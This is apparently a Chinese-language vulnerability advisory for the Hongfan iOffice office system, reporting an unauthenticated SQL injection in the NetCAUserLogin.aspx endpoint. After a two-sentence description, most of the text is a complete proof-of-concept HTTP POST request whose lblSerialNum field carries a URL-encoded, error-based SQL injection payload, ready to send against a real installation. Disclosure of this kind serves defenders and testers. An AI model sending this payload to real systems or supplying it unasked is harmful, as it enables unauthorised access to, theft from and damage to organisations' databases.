漏洞描述
红帆 ioffice 是一款企业级办公自动化系统,提供全面的文档管理、流程审批和协作功能。在 /iOffice/Identity/NetCAUserLogin.aspx 接口中存在 SQL 注入漏洞,攻击者可以通过构造恶意 SQL 语句,未授权访问数据库,获取敏感信息或对数据库进行破坏性操作。
红帆 ioffice /iOffice/Identity/NetCAUserLogin.aspx SQL 注入漏洞
PoC代码
POST /ioffice/Identity/NetCAUserLogin.aspx HTTP/1.1
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
ioScriptManager1%24ScriptManager1=updatePanel1%7CbtVerify&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyMTUyMDIxNTRkZP07H79WIvd3R0It8GvgZeNLQtUV&__VIEWSTATEGENERATOR=65AD83CA&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&lblSerialNum=%27+AND+9176+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289176%3D9176%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28113%29%29%29--+Vgmc&__ASYNCPOST=true&btVerify=